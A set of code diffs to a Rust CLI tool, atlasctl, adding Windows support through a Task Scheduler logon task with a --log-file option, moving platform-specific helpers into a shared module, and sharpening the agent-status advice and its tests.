 use atlasctl_core::docker::profile::{NvidiaDevices, ROOTLESS_V1};
 use atlasctl_core::docker::translate::{DEFAULT_MASTER_PORT, LaunchContext, Placement, translate};
-use atlasctl_core::host::HostSnapshot;
+use atlasctl_core::host::{HostSnapshot, PosixUser};
 use atlasctl_core::recipe::{Provenance, Recipe};
 use atlasctl_core::scalar::ScalarValue;
 use atlasctl_core::settings::{self, Disposition};
@@ -28,8 +28,10 @@ use std::path::PathBuf;
 /// A host that does not exist, so goldens are identical on every machine.
 fn fixed_host() -> HostSnapshot {
     HostSnapshot {
-        uid: 1000,
-        gid: 1000,
+        posix_user: Some(PosixUser {
+            uid: 1000,
+            gid: 1000,
+        }),
         home: "/home/spark".into(),
         hf_cache_dir: "/home/spark/.cache/huggingface".into(),
         env: BTreeMap::new(),

--- a/crates/atlasctl-core/tests/golden.rs
+++ b/crates/atlasctl-core/tests/golden.rs
@@ -87,7 +87,11 @@ fn render(recipe: &Recipe) -> String {
         out.push_str(&format!("# {label} — shell\n{}\n\n", plan.docker));
         out.push_str(&format!(
             "# {label} — portable\n{}\n\n",
-            plan.docker.display_portable(Some("/home/spark"))
+            // The placeholder is pinned, not read from the platform: the
+            // corpus is generated on Linux and compared byte for byte, so a
+            // target-dependent one would make every golden fail everywhere
+            // else while nothing had actually changed.
+            plan.docker.display_portable(Some("/home/spark"), "$HOME")
         ));
         out.push_str(&format!(
             "# {label} — argv\n{}\n\n",

--- a/crates/atlasctl/README.md
+++ b/crates/atlasctl/README.md
@@ -28,6 +28,8 @@ registry can supply recipe data but can never cause a command to run. See
 for why that matters and what it replaces.
 
 Requires Docker to launch anything; `list`, `show`, and `run --print` work
-without it. Linux and macOS; Windows is not supported.
+without it. Linux, macOS and Windows — on Windows the agent is supervised by
+a Task Scheduler task at logon rather than a service, because a service runs
+in session 0 and cannot reach Docker Desktop's per-user named pipe.
 
 AGPL-3.0-only.

--- a/crates/atlasctl/src/cli.rs
+++ b/crates/atlasctl/src/cli.rs
@@ -239,6 +239,15 @@ pub struct AgentRunArgs {
     /// starting at all.
     #[arg(long)]
     pub no_browser: bool,
+
+    /// Append this process's output to a file instead of the terminal.
+    ///
+    /// For a supervised agent whose supervisor captures nothing — which is
+    /// every Task Scheduler task. Not a default: a user running `agent run` by
+    /// hand wants their output in front of them, and silently diverting it is
+    /// how "it printed nothing" becomes a bug report.
+    #[arg(long, value_name = "PATH")]
+    pub log_file: Option<std::path::PathBuf>,
 }
 
 /// `agent status` arguments.

--- a/crates/atlasctl/src/commands/agent.rs
+++ b/crates/atlasctl/src/commands/agent.rs
@@ -71,6 +71,12 @@ fn probe_can_launch(runner: &dyn ProcessRunner) -> Result<(), String> {
 
 /// Run the agent in the foreground.
 pub fn run(args: &AgentRunArgs) -> Result<()> {
+    // First, before anything can print: everything below reports through
+    // stderr, and a diagnostic emitted before the redirect is a diagnostic the
+    // operator will never find.
+    if let Some(path) = &args.log_file {
+        atlasctl_core::platform::redirect_stdio(path)?;
+    }
     let config_dir = hostinfo::config_dir()?;
     // Checked once, up front, so a permission problem is reported in full
     // rather than as whichever of the three state files happened to be touched

--- a/crates/atlasctl/src/commands/agent.rs
+++ b/crates/atlasctl/src/commands/agent.rs
@@ -438,65 +438,6 @@ pub fn run(args: &AgentRunArgs) -> Result<()> {
     })
 }
 
-/// What to tell the operator about this machine's links, as three distinct
-/// facts rather than two.
-///
-/// The distinction is the whole point: "we could not look" and "we looked and
-/// there is nothing" send a person to different places, and only one of them
-/// is a statement about their network. Pure so it can be tested — the
-/// enumeration it describes shells out, which is why the claim it makes is
-/// worth pinning down separately from the I/O that feeds it.
-fn link_line(first: Result<Option<(String, &'static str)>, String>) -> String {
-    match first {
-        Err(why) => format!(
-            "could not read this machine's network interfaces: {why} \
-             — clustering is off until that is fixed; run `atlasctl doctor`"
-        ),
-        Ok(None) => "no usable network link — this agent cannot take part in a cluster".to_owned(),
-        Ok(Some((addr, class))) => format!("cluster address: {addr} ({class})"),
-    }
-}
+mod linkline;
 
-#[cfg(test)]
-mod link_line_tests {
-    use super::link_line;
-
-    #[test]
-    fn a_failed_enumeration_is_never_reported_as_an_absent_network() {
-        let e = link_line(Err("running `ip -o -4 addr show`: No such file".into()));
-        assert!(
-            e.contains("could not read"),
-            "the operator must learn we could not look: {e}"
-        );
-        assert!(
-            !e.contains("no usable network link"),
-            "claiming the network is absent when `ip` is missing sends them to \
-             debug hardware that is fine: {e}"
-        );
-        assert!(
-            e.contains("doctor"),
-            "and it must say what to run next: {e}"
-        );
-    }
-
-    #[test]
-    fn an_empty_enumeration_still_says_the_network_is_the_problem() {
-        // The other side of the same coin: when we DID look and found nothing,
-        // hedging would be just as wrong.
-        let e = link_line(Ok(None));
-        assert_eq!(
-            e,
-            "no usable network link — this agent cannot take part in a cluster"
-        );
-    }
-
-    #[test]
-    fn a_found_address_is_reported_with_its_link_class() {
-        // The class is what tells RoCE from Wi-Fi, which is what the operator
-        // needs to know a cluster will actually be fast.
-        assert_eq!(
-            link_line(Ok(Some(("10.10.10.1".to_owned(), "InfiniBand")))),
-            "cluster address: 10.10.10.1 (InfiniBand)"
-        );
-    }
-}
+use linkline::link_line;

--- a/crates/atlasctl/src/commands/agent/linkline.rs
+++ b/crates/atlasctl/src/commands/agent/linkline.rs
@@ -1,0 +1,70 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+
+//! What an agent says about this machine's network on startup.
+//!
+//! Split from [`super`] for size, along the seam that was already there: this
+//! is the one pure decision in a function that is otherwise all I/O, and it was
+//! already carrying its own test module for exactly that reason.
+
+/// What to tell the operator about this machine's links, as three distinct
+/// facts rather than two.
+///
+/// The distinction is the whole point: "we could not look" and "we looked and
+/// there is nothing" send a person to different places, and only one of them
+/// is a statement about their network. Pure so it can be tested — the
+/// enumeration it describes shells out, which is why the claim it makes is
+/// worth pinning down separately from the I/O that feeds it.
+pub(super) fn link_line(first: Result<Option<(String, &'static str)>, String>) -> String {
+    match first {
+        Err(why) => format!(
+            "could not read this machine's network interfaces: {why} \
+             — clustering is off until that is fixed; run `atlasctl doctor`"
+        ),
+        Ok(None) => "no usable network link — this agent cannot take part in a cluster".to_owned(),
+        Ok(Some((addr, class))) => format!("cluster address: {addr} ({class})"),
+    }
+}
+
+#[cfg(test)]
+mod link_line_tests {
+    use super::link_line;
+
+    #[test]
+    fn a_failed_enumeration_is_never_reported_as_an_absent_network() {
+        let e = link_line(Err("running `ip -o -4 addr show`: No such file".into()));
+        assert!(
+            e.contains("could not read"),
+            "the operator must learn we could not look: {e}"
+        );
+        assert!(
+            !e.contains("no usable network link"),
+            "claiming the network is absent when `ip` is missing sends them to \
+             debug hardware that is fine: {e}"
+        );
+        assert!(
+            e.contains("doctor"),
+            "and it must say what to run next: {e}"
+        );
+    }
+
+    #[test]
+    fn an_empty_enumeration_still_says_the_network_is_the_problem() {
+        // The other side of the same coin: when we DID look and found nothing,
+        // hedging would be just as wrong.
+        let e = link_line(Ok(None));
+        assert_eq!(
+            e,
+            "no usable network link — this agent cannot take part in a cluster"
+        );
+    }
+
+    #[test]
+    fn a_found_address_is_reported_with_its_link_class() {
+        // The class is what tells RoCE from Wi-Fi, which is what the operator
+        // needs to know a cluster will actually be fast.
+        assert_eq!(
+            link_line(Ok(Some(("10.10.10.1".to_owned(), "InfiniBand")))),
+            "cluster address: 10.10.10.1 (InfiniBand)"
+        );
+    }
+}

--- a/crates/atlasctl/src/commands/agentinfo.rs
+++ b/crates/atlasctl/src/commands/agentinfo.rs
@@ -31,9 +31,11 @@ pub fn token(args: &AgentTokenArgs) -> Result<()> {
 ///
 /// Pure so it can be tested: the probe itself is a socket connect, and the
 /// interesting behaviour is which advice an operator gets, not whether the
-/// kernel can refuse a connection.
+/// kernel can refuse a connection. `installed` is passed in for the same
+/// reason — whether a unit exists on disk is I/O, and which advice follows
+/// from it is a rule.
 #[must_use]
-pub fn status_advice(port: u16) -> Vec<String> {
+pub fn status_advice(port: u16, installed: bool) -> Vec<String> {
     let mut out = Vec::new();
     if port == atlasctl_agent::DEFAULT_PORT {
         // Naming the flag matters more than it looks: an operator who installed
@@ -46,7 +48,29 @@ pub fn status_advice(port: u16) -> Vec<String> {
                 .to_owned(),
         );
     }
-    out.push("or start it with: atlasctl agent run".to_owned());
+    // `agent install`, not `agent run`. The old advice was the one command that
+    // does not survive the terminal it was typed in, so a machine "fixed" that
+    // way silently leaves the fleet at the next logout — and every other
+    // surface, including the website's own guide, says `install`. Since #112 it
+    // also STARTS a service that is merely stopped, which is the state this
+    // branch is most often reached in.
+    if installed {
+        out.push(
+            "a service IS installed here but nothing is listening.\n  \
+             Start it with:  atlasctl agent install"
+                .to_owned(),
+        );
+    } else {
+        out.push(
+            "no service is installed on this machine.\n  \
+             Install and start one with:  atlasctl agent install"
+                .to_owned(),
+        );
+    }
+    out.push(
+        "or run it in this terminal, for as long as it stays open:\n  atlasctl agent run"
+            .to_owned(),
+    );
     out
 }
 
@@ -65,7 +89,18 @@ pub fn status(args: &AgentStatusArgs) -> Result<()> {
         }
         Err(e) => {
             println!("agent: not running on {addr} ({e})");
-            for line in status_advice(args.port) {
+            // Best effort: a machine whose home directory cannot be read is a
+            // machine we cannot make this claim about, and guessing "installed"
+            // either way would send the operator to the wrong command.
+            let installed = crate::hostinfo::home_dir().is_ok_and(|home| {
+                crate::service::installed_unit(
+                    &atlasctl_core::io::StdFileSystem,
+                    &home,
+                    crate::commands::service::uid_of(&home),
+                )
+                .is_ok_and(|u| u.is_some())
+            });
+            for line in status_advice(args.port, installed) {
                 println!("{line}");
             }
             bail!("no agent is listening on {addr}")
@@ -80,7 +115,7 @@ mod status_tests {
     /// An operator on the default port may simply not know the flag exists.
     #[test]
     fn the_default_port_suggests_looking_elsewhere_first() {
-        let a = status_advice(atlasctl_agent::DEFAULT_PORT);
+        let a = status_advice(atlasctl_agent::DEFAULT_PORT, false);
         assert!(
             a.iter().any(|l| l.contains("--port")),
             "must name the flag: {a:?}"
@@ -92,7 +127,7 @@ mod status_tests {
     /// they gave was not the one probed.
     #[test]
     fn an_explicit_port_is_not_second_guessed() {
-        let a = status_advice(9000);
+        let a = status_advice(9000, false);
         assert!(
             !a.iter().any(|l| l.contains("--port")),
             "must not re-suggest the flag: {a:?}"
@@ -101,5 +136,25 @@ mod status_tests {
             a.iter().any(|l| l.contains("agent run")),
             "still offers a start"
         );
+    }
+
+    /// The two states an operator is actually in, and they need different
+    /// commands. Reporting only "not running" made "I installed it and it
+    /// stopped" indistinguishable from "I never installed it", and the single
+    /// piece of advice offered — `agent run` — was wrong for both: it is the
+    /// one command that does not survive the terminal it was typed in.
+    #[test]
+    fn a_stopped_service_and_a_missing_one_are_told_apart() {
+        let stopped = status_advice(9000, true).join("\n");
+        let missing = status_advice(9000, false).join("\n");
+        assert!(stopped.contains("service IS installed"), "{stopped}");
+        assert!(missing.contains("no service is installed"), "{missing}");
+        // Both lead with the command that works in either case and persists.
+        for a in [&stopped, &missing] {
+            assert!(a.contains("atlasctl agent install"), "{a}");
+            let install = a.find("agent install").expect("offers install");
+            let run = a.find("agent run").expect("still offers the foreground");
+            assert!(install < run, "the persistent option must come first: {a}");
+        }
     }
 }

--- a/crates/atlasctl/src/commands/agentpair.rs
+++ b/crates/atlasctl/src/commands/agentpair.rs
@@ -192,9 +192,7 @@ fn dial_hosts() -> Vec<String> {
 }
 
 fn hostname_hint() -> String {
-    std::fs::read_to_string("/proc/sys/kernel/hostname")
-        .map(|h| h.trim().to_owned())
-        .unwrap_or_else(|_| "<this-machine>".to_owned())
+    atlasctl_core::platform::hostname()
 }
 
 /// Every place to dial, as one `peer add` target.

--- a/crates/atlasctl/src/commands/agentpair.rs
+++ b/crates/atlasctl/src/commands/agentpair.rs
@@ -192,7 +192,10 @@ fn dial_hosts() -> Vec<String> {
 }
 
 fn hostname_hint() -> String {
-    atlasctl_core::platform::hostname()
+    // A placeholder that obviously is not a hostname. This goes into a
+    // `peer add` line the operator must edit, and a plausible-looking fallback
+    // gets pasted verbatim and dialled.
+    atlasctl_core::platform::hostname_or("<this-machine>")
 }
 
 /// Every place to dial, as one `peer add` target.

--- a/crates/atlasctl/src/commands/doctor.rs
+++ b/crates/atlasctl/src/commands/doctor.rs
@@ -88,7 +88,7 @@ fn check_sparkrun() -> usize {
         return 0;
     };
     let config = std::path::Path::new(&home).join(".config/sparkrun/registries.yaml");
-    let installed = which("sparkrun").is_some();
+    let installed = atlasctl_core::platform::which("sparkrun").is_some();
     let redirected = std::fs::read_to_string(&config)
         .map(|s| s.contains(COMPROMISED_HOST))
         .unwrap_or(false);
@@ -118,14 +118,6 @@ fn check_sparkrun() -> usize {
     1
 }
 
-/// Find a binary on PATH.
-fn which(name: &str) -> Option<std::path::PathBuf> {
-    let path = std::env::var_os("PATH")?;
-    std::env::split_paths(&path)
-        .map(|d| d.join(name))
-        .find(|p| p.is_file())
-}
-
 /// Where the agent keeps its identity, its pins and its browser token.
 /// Free space where docker and the model cache live.
 ///
@@ -137,19 +129,8 @@ fn which(name: &str) -> Option<std::path::PathBuf> {
 /// unreadable `df` says nothing about whether there is room, and doctor now
 /// exits non-zero on a problem, so guessing here would fail a healthy box.
 fn check_disk() -> Finding {
-    let out = StdProcessRunner.run(&["df".into(), "-Pk".into(), ".".into()]);
-    let free_kb = out.ok().and_then(|o| {
-        if !o.success() {
-            return None;
-        }
-        o.stdout
-            .lines()
-            .nth(1)
-            .and_then(|l| l.split_whitespace().nth(3).map(str::to_owned))
-            .and_then(|k| k.parse::<u64>().ok())
-    });
-    match free_kb {
-        Some(kb) => doctor_checks::disk_space(kb.saturating_mul(1024), "."),
+    match atlasctl_core::platform::free_bytes(std::path::Path::new(".")) {
+        Some(bytes) => doctor_checks::disk_space(bytes, "."),
         None => doctor_checks::disk_unknown(),
     }
 }
@@ -197,16 +178,5 @@ fn check_reachable() -> Finding {
             doctor_checks::reachable(&addrs)
         }
         Err(e) => doctor_checks::unreadable_interfaces(&format!("{e:#}")),
-    }
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-
-    #[test]
-    fn which_finds_a_binary_that_exists_and_not_one_that_does_not() {
-        assert!(which("sh").is_some());
-        assert!(which("definitely-not-a-real-binary-xyz").is_none());
     }
 }

--- a/crates/atlasctl/src/commands/recipe.rs
+++ b/crates/atlasctl/src/commands/recipe.rs
@@ -103,7 +103,13 @@ pub fn show(args: &ShowArgs) -> Result<()> {
             &ctx,
         )?;
         if args.portable {
-            println!("{}", plan.docker.display_portable(Some(&host.home)));
+            println!(
+                "{}",
+                plan.docker.display_portable(
+                    Some(&host.home),
+                    atlasctl_core::platform::home_placeholder()
+                )
+            );
         } else {
             println!("{}", plan.docker);
         }

--- a/crates/atlasctl/src/commands/run.rs
+++ b/crates/atlasctl/src/commands/run.rs
@@ -91,7 +91,13 @@ pub fn run(args: &RunArgs) -> Result<()> {
 
     if args.print {
         if args.portable {
-            println!("{}", plan.docker.display_portable(Some(&host.home)));
+            println!(
+                "{}",
+                plan.docker.display_portable(
+                    Some(&host.home),
+                    atlasctl_core::platform::home_placeholder()
+                )
+            );
         } else {
             println!("{}", plan.docker);
         }

--- a/crates/atlasctl/src/commands/service.rs
+++ b/crates/atlasctl/src/commands/service.rs
@@ -218,12 +218,12 @@ pub fn uninstall() -> Result<()> {
 /// Zero when it cannot be determined: only launchd reads it, and on macOS a
 /// home directory always has an owner, so the fallback is unreachable there.
 #[cfg(unix)]
-fn uid_of(home: &std::path::Path) -> u32 {
+pub(crate) fn uid_of(home: &std::path::Path) -> u32 {
     use std::os::unix::fs::MetadataExt;
     std::fs::metadata(home).map(|m| m.uid()).unwrap_or(0)
 }
 
 #[cfg(not(unix))]
-fn uid_of(_home: &std::path::Path) -> u32 {
+pub(crate) fn uid_of(_home: &std::path::Path) -> u32 {
     0
 }

--- a/crates/atlasctl/src/commands/service.rs
+++ b/crates/atlasctl/src/commands/service.rs
@@ -64,6 +64,14 @@ pub fn install(args: &crate::cli::AgentInstallArgs) -> Result<()> {
             crate::service::plan::ServiceKind::Systemd => {
                 println!("    journalctl --user -u atlasctl-agent -n 50");
             }
+            // Task Scheduler captures nothing, which is why the task runs
+            // through `cmd` with a redirect; this is that file.
+            crate::service::plan::ServiceKind::ScheduledTask => {
+                println!(
+                    "    Get-Content -Tail 50 {}",
+                    crate::service::plan::windows_log_path(&home).display()
+                );
+            }
         }
     }
     println!("  unit: {}", done.unit_path.display());

--- a/crates/atlasctl/src/commands/service.rs
+++ b/crates/atlasctl/src/commands/service.rs
@@ -35,6 +35,7 @@ pub fn install(args: &crate::cli::AgentInstallArgs) -> Result<()> {
         // same trap the port comment warns about — except this one would move
         // the node's identity rather than its port.
         config_dir: std::env::var_os(crate::configdir::DIR_ENV).map(std::path::PathBuf::from),
+        log_file: None,
     };
     let done = crate::service::install(
         &atlasctl_core::io::StdFileSystem,

--- a/crates/atlasctl/src/commands/service.rs
+++ b/crates/atlasctl/src/commands/service.rs
@@ -65,11 +65,13 @@ pub fn install(args: &crate::cli::AgentInstallArgs) -> Result<()> {
             crate::service::plan::ServiceKind::Systemd => {
                 println!("    journalctl --user -u atlasctl-agent -n 50");
             }
-            // Task Scheduler captures nothing, which is why the task runs
-            // through `cmd` with a redirect; this is that file.
+            // Task Scheduler captures nothing, which is why the agent is
+            // started with `--log-file`; this is that file. Quoted, because a
+            // profile path with a space in it is the common case and an
+            // unquoted one fails when pasted.
             crate::service::plan::ServiceKind::ScheduledTask => {
                 println!(
-                    "    Get-Content -Tail 50 {}",
+                    "    Get-Content -Tail 50 '{}'",
                     crate::service::plan::windows_log_path(&home).display()
                 );
             }

--- a/crates/atlasctl/src/configdir.rs
+++ b/crates/atlasctl/src/configdir.rs
@@ -37,12 +37,10 @@ pub fn resolve() -> Result<PathBuf> {
     {
         return Ok(PathBuf::from(dir));
     }
-    let base = std::env::var("XDG_CONFIG_HOME")
-        .or_else(|_| std::env::var("HOME").map(|h| format!("{h}/.config")))
-        .with_context(|| {
-            format!("neither {DIR_ENV}, XDG_CONFIG_HOME nor HOME is set, so there is nowhere to keep this node's identity")
-        })?;
-    Ok(PathBuf::from(base).join("atlasctl"))
+    let base = atlasctl_core::platform::config_base().with_context(|| {
+        format!("{DIR_ENV} is not set either, so there is nowhere to keep this node's identity")
+    })?;
+    Ok(base.join("atlasctl"))
 }
 
 /// What a directory looks like to the process trying to use it.

--- a/crates/atlasctl/src/hostinfo.rs
+++ b/crates/atlasctl/src/hostinfo.rs
@@ -93,7 +93,16 @@ mod tests {
     #[test]
     fn the_snapshot_reflects_the_running_process() {
         let s = snapshot().expect("a home directory is set in any sane environment");
-        assert_eq!(s.posix_user, atlasctl_core::platform::posix_user());
+        // Against the OS, not against the expression `snapshot` assigns.
+        // Comparing to `platform::posix_user()` made both sides the same call,
+        // so the assertion could only catch non-determinism.
+        #[cfg(unix)]
+        {
+            let u = s.posix_user.expect("unix always has one");
+            assert_eq!(u.uid, rustix::process::getuid().as_raw());
+        }
+        #[cfg(windows)]
+        assert!(s.posix_user.is_none());
         assert!(!s.home.is_empty());
         assert!(s.hf_cache_dir.contains("huggingface"));
     }

--- a/crates/atlasctl/src/hostinfo.rs
+++ b/crates/atlasctl/src/hostinfo.rs
@@ -6,16 +6,15 @@
 //! Everything downstream takes the resulting snapshot, which is what keeps
 //! translation pure and reproducible.
 
-use anyhow::{Context, Result};
+use anyhow::Result;
 use atlasctl_core::host::HostSnapshot;
 use std::collections::BTreeMap;
 
 /// Capture the current host.
 pub fn snapshot() -> Result<HostSnapshot> {
-    let home = std::env::var("HOME").context("HOME is not set")?;
+    let home = atlasctl_core::platform::home_string()?;
     Ok(HostSnapshot {
-        uid: rustix::process::getuid().as_raw(),
-        gid: rustix::process::getgid().as_raw(),
+        posix_user: atlasctl_core::platform::posix_user(),
         hf_cache_dir: hf_cache_dir(&home),
         home,
         env: std::env::vars().collect::<BTreeMap<_, _>>(),
@@ -28,7 +27,13 @@ pub fn snapshot() -> Result<HostSnapshot> {
 /// convention every HuggingFace tool follows; otherwise the documented default
 /// under the user's home directory.
 fn hf_cache_dir(home: &str) -> String {
-    std::env::var("HF_HOME").unwrap_or_else(|_| format!("{home}/.cache/huggingface"))
+    std::env::var("HF_HOME").unwrap_or_else(|_| {
+        std::path::Path::new(home)
+            .join(".cache")
+            .join("huggingface")
+            .display()
+            .to_string()
+    })
 }
 
 /// Where atlasctl keeps its configuration.
@@ -73,17 +78,12 @@ pub fn usable_config_dir() -> Result<std::path::PathBuf> {
 /// # Errors
 /// If `HOME` is not set.
 pub fn home_dir() -> Result<std::path::PathBuf> {
-    std::env::var("HOME")
-        .map(std::path::PathBuf::from)
-        .context("HOME is not set, so there is nowhere to install a user service")
+    atlasctl_core::platform::home_dir()
 }
 
 /// Where atlasctl caches registry clones.
 pub fn cache_dir() -> Result<std::path::PathBuf> {
-    let base = std::env::var("XDG_CACHE_HOME")
-        .or_else(|_| std::env::var("HOME").map(|h| format!("{h}/.cache")))
-        .context("neither XDG_CACHE_HOME nor HOME is set")?;
-    Ok(std::path::PathBuf::from(base).join("atlasctl"))
+    Ok(atlasctl_core::platform::cache_base()?.join("atlasctl"))
 }
 
 #[cfg(test)]
@@ -92,8 +92,8 @@ mod tests {
 
     #[test]
     fn the_snapshot_reflects_the_running_process() {
-        let s = snapshot().expect("HOME is set in any sane environment");
-        assert_eq!(s.uid, rustix::process::getuid().as_raw());
+        let s = snapshot().expect("a home directory is set in any sane environment");
+        assert_eq!(s.posix_user, atlasctl_core::platform::posix_user());
         assert!(!s.home.is_empty());
         assert!(s.hf_cache_dir.contains("huggingface"));
     }

--- a/crates/atlasctl/src/rankservice/tests.rs
+++ b/crates/atlasctl/src/rankservice/tests.rs
@@ -4,6 +4,7 @@
 
 use super::*;
 use atlasctl_core::docker::{NvidiaDevices, ROOTLESS_V1};
+use atlasctl_core::host::PosixUser;
 use atlasctl_core::io::RecordingRunner;
 use atlasctl_core::io::process::Output;
 use atlasctl_protocol::fleet::NodeId;
@@ -15,8 +16,10 @@ const RECIPE: &str = "qwen3.5-122b-a10b-nvfp4-ep2";
 
 fn host() -> atlasctl_core::host::HostSnapshot {
     atlasctl_core::host::HostSnapshot {
-        uid: 1000,
-        gid: 1000,
+        posix_user: Some(PosixUser {
+            uid: 1000,
+            gid: 1000,
+        }),
         home: "/home/spark".into(),
         hf_cache_dir: "/home/spark/.cache/huggingface".into(),
         env: BTreeMap::new(),

--- a/crates/atlasctl/src/service.rs
+++ b/crates/atlasctl/src/service.rs
@@ -133,6 +133,26 @@ pub fn install(
 ///
 /// # Errors
 /// If the platform is unsupported or the unit cannot be deleted.
+/// Whether a supervisor on this machine knows about the agent.
+///
+/// The unit file's presence, not a process probe. The two answer different
+/// questions and an operator needs both: something holding the port is a
+/// machine that works *today*, and a unit on disk is a machine that will still
+/// work tomorrow. Reporting only the first is how "I installed it" and "I ran
+/// it in a terminal" became indistinguishable.
+///
+/// # Errors
+/// If this platform has no supported supervisor.
+pub fn installed_unit(
+    fs: &dyn FileSystem,
+    home: &std::path::Path,
+    uid: u32,
+) -> Result<Option<PathBuf>> {
+    let kind = ServiceKind::detect()?;
+    let p = teardown_plan(kind, home, uid);
+    Ok(fs.exists(&p.unit_path).then_some(p.unit_path))
+}
+
 pub fn uninstall(
     fs: &dyn FileSystem,
     runner: &dyn ProcessRunner,

--- a/crates/atlasctl/src/service.rs
+++ b/crates/atlasctl/src/service.rs
@@ -176,6 +176,7 @@ fn teardown_plan(kind: ServiceKind, home: &std::path::Path, uid: u32) -> Service
             discovery: true,
             browser: true,
             config_dir: None,
+            log_file: None,
         },
         home,
         uid,

--- a/crates/atlasctl/src/service/plan.rs
+++ b/crates/atlasctl/src/service/plan.rs
@@ -89,6 +89,13 @@ pub struct AgentInvocation {
     /// identity, and rejoined the fleet as a stranger with zero pins. The
     /// operator sees a node that paired a moment ago and is now untrusted.
     pub config_dir: Option<PathBuf>,
+    /// Where the supervised agent's output is appended, when the supervisor
+    /// does not capture it itself.
+    ///
+    /// Recorded in the unit for the same reason the port is: a unit outlives
+    /// the binary that wrote it, and an agent whose log moved without its unit
+    /// knowing writes where nobody is looking.
+    pub log_file: Option<PathBuf>,
 }
 
 impl AgentInvocation {
@@ -120,6 +127,10 @@ impl AgentInvocation {
         }
         if !self.browser {
             v.push("--no-browser".to_owned());
+        }
+        if let Some(log) = &self.log_file {
+            v.push("--log-file".to_owned());
+            v.push(log.display().to_string());
         }
         v
     }

--- a/crates/atlasctl/src/service/plan.rs
+++ b/crates/atlasctl/src/service/plan.rs
@@ -11,6 +11,10 @@
 //! install that writes a unit naming the wrong binary, or one that enables a
 //! service before reloading the daemon that would notice it exists.
 
+mod windows;
+
+pub use windows::windows_log_path;
+
 use anyhow::{Result, bail};
 use std::path::{Path, PathBuf};
 
@@ -27,14 +31,17 @@ pub enum ServiceKind {
     Systemd,
     /// A launchd LaunchAgent, on macOS.
     Launchd,
+    /// A Task Scheduler task at logon, on Windows.
+    ///
+    /// A task and not a Windows service, and at logon rather than at boot: a
+    /// service runs in session 0, which cannot reach Docker Desktop's per-user
+    /// named pipe, so the agent would come up healthy and be unable to launch
+    /// anything.
+    ScheduledTask,
 }
 
 impl ServiceKind {
     /// What this build targets.
-    ///
-    /// Windows is deliberately absent rather than guessed at: it needs a
-    /// Scheduled Task at logon, not a service, because session 0 cannot reach
-    /// Docker Desktop's per-user named pipe.
     ///
     /// # Errors
     /// On a platform with no supported supervisor.
@@ -43,6 +50,8 @@ impl ServiceKind {
             Ok(Self::Systemd)
         } else if cfg!(target_os = "macos") {
             Ok(Self::Launchd)
+        } else if cfg!(target_os = "windows") {
+            Ok(Self::ScheduledTask)
         } else {
             bail!(
                 "installing a background service is not supported on this platform yet.\n\
@@ -170,6 +179,7 @@ pub fn plan(kind: ServiceKind, agent: &AgentInvocation, home: &Path, uid: u32) -
     match kind {
         ServiceKind::Systemd => systemd(agent, home),
         ServiceKind::Launchd => launchd(agent, home, uid),
+        ServiceKind::ScheduledTask => windows::scheduled_task(agent, home),
     }
 }
 
@@ -336,7 +346,7 @@ fn shell_words(argv: &[String]) -> String {
 }
 
 /// Escape a value for the plist, which is XML.
-fn xml_escape(s: &str) -> String {
+pub(super) fn xml_escape(s: &str) -> String {
     s.replace('&', "&amp;")
         .replace('<', "&lt;")
         .replace('>', "&gt;")

--- a/crates/atlasctl/src/service/plan.rs
+++ b/crates/atlasctl/src/service/plan.rs
@@ -14,6 +14,8 @@
 mod windows;
 
 pub use windows::windows_log_path;
+#[cfg(test)]
+pub(crate) use windows::windows_quote_for_test;
 
 use anyhow::{Result, bail};
 use std::path::{Path, PathBuf};

--- a/crates/atlasctl/src/service/plan/windows.rs
+++ b/crates/atlasctl/src/service/plan/windows.rs
@@ -133,8 +133,22 @@ pub(super) fn scheduled_task(agent: &AgentInvocation, home: &Path) -> ServicePla
         // The same question `is-active` answers: the task EXISTING is not the
         // agent running, and `Get-ScheduledTask` alone would report success for
         // a task whose process died on startup.
+        // Polled, not sampled once. `Start-ScheduledTask` returns as soon as
+        // the scheduler has ACCEPTED the request, not when the process is up,
+        // so a single read right after it reports `Ready` and the install
+        // announces "installed, but it is NOT running" for an agent that is
+        // about to be. That is what a REINSTALL did on CI, because a replaced
+        // task has to be stopped and started rather than merely started. Ten
+        // seconds is long enough for that, and short enough that a genuinely
+        // crash-looping agent is still reported as one.
         verify: ps(&format!(
-            "if ((Get-ScheduledTask -TaskName '{SERVICE_NAME}'              -ErrorAction SilentlyContinue).State -eq 'Running')              {{ exit 0 }} else {{ exit 1 }}"
+            "$deadline = (Get-Date).AddSeconds(10); \
+             do {{ \
+               if ((Get-ScheduledTask -TaskName '{SERVICE_NAME}' \
+                    -ErrorAction SilentlyContinue).State -eq 'Running') {{ exit 0 }}; \
+               Start-Sleep -Milliseconds 250 \
+             }} while ((Get-Date) -lt $deadline); \
+             exit 1"
         )),
         best_effort: Vec::new(),
         deactivate: vec![ps(&format!(

--- a/crates/atlasctl/src/service/plan/windows.rs
+++ b/crates/atlasctl/src/service/plan/windows.rs
@@ -101,8 +101,20 @@ pub(super) fn scheduled_task(agent: &AgentInvocation, home: &Path) -> ServicePla
 
     // Register through PowerShell rather than `schtasks /XML`: schtasks reads
     // the file itself and rejects anything it does not consider Unicode, while
-    // `Get-Content -Raw` hands the API a string and the file's encoding stops
-    // mattering.
+    // `Get-Content` hands the API a string.
+    //
+    // `-Encoding UTF8` is not optional. `powershell` is always 5.1, whose
+    // `Get-Content` decodes as the system ANSI codepage when the file has no
+    // BOM — and the unit is written UTF-8 without one. The body always contains
+    // a multibyte character, so on a profile path like `C:\Users\José` the
+    // registered `--log-file` and `--config-dir` arrive mojibake'd: the agent
+    // logs into a directory that does not exist, and a corrupted `--config-dir`
+    // mints a fresh identity and rejoins the fleet as a stranger.
+    //
+    // `-LiteralPath` for the same class of reason: `-Path` globs, and
+    // `C:\Users\[lab]\...` is a legal path whose brackets `-Path` reads as a
+    // character class, failing a perfectly valid install with "cannot find
+    // path".
     let ps = |script: &str| {
         vec![
             "powershell".to_owned(),
@@ -127,26 +139,34 @@ pub(super) fn scheduled_task(agent: &AgentInvocation, home: &Path) -> ServicePla
         ))],
         activate: vec![
             ps(&format!(
-                "Register-ScheduledTask -TaskName '{SERVICE_NAME}'                  -Xml (Get-Content -Raw -Path {quoted_unit}) -Force | Out-Null"
+                "Register-ScheduledTask -TaskName '{SERVICE_NAME}'                  -Xml (Get-Content -Raw -Encoding UTF8 -LiteralPath {quoted_unit}) \
+                 -Force | Out-Null"
             )),
             ps(&format!("Start-ScheduledTask -TaskName '{SERVICE_NAME}'")),
         ],
         // The same question `is-active` answers: the task EXISTING is not the
